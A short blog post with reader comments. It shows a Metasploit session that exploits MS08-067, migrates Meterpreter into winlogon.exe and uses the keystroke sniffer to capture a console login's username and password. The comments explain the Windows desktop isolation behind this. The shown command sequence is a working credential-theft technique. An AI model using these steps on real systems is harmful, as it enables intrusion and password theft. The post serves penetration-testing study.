In my previous post, I described the keystroke sniffing capabilities of the Meterpreter payload. One of the key restrictions of this feature is that it can only sniff while running inside of a process with interactive access to the desktop. In the case of the MS08-067 exploit, we had to migrate into Explorer.exe in order to capture the logged-on user's keystrokes.
While testing the keystroke sniffer, it occurred to me to migrate into the Winlogon.exe process instead. This process should have interactive access to the desktop, however when I tried to sniff the active user's keystrokes this way, it was not successful. Although Winlogon could not access the logged-on desktop using GetAsyncKeyState, it can capture the username and password of anyone logging into the target's console. The example below demonstrates this process:
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability...
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 440
[*] Migrating to 440...
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer...
[ wait for user login ]
meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator <Tab> s3cretp4ss <Return>
Sunday, March 22, 2009
Subscribe to:
Post Comments (Atom)
3 comments:
I think you already know that, but it is quite clear why winlogon.exe cannot sniff user processes; it is the same reason why user processes cannot sniff passwords when the desktop is locked. The interactive window station (WinSta0) has 3 desktops, "Default", "Disconnect" and "Winlogon", which share the mouse pointer, but each have their own keyboard buffer and clipboard. Winlogon (and the lock workstation tool and screensavers) runs on the Winlogon desktop, Explorer runs on the Default Desktop. (Services run on their own window station, either one winsta per user under whose credentials the service is running, or one winsta for all of them and one desktop for each user).
You can list window stations and desktops using the free EnumWinstaGUI tool, and show the window station and desktop of a process in the "handles" view of Process Explorer.
The latest revision of meterpreter now has "enumdesktops" to locate these windows stations/desktops and soon "setdesktop" to change into it. Thanks for sharing!
thanks for sharing that piece of information mihi!!
metasploit sure have matured into a awesome application. very useful. i dont meant the exploits per se; the tools are a huge timesaver for a variety of stuff i'm working on ;)
Thanks.
Post a Comment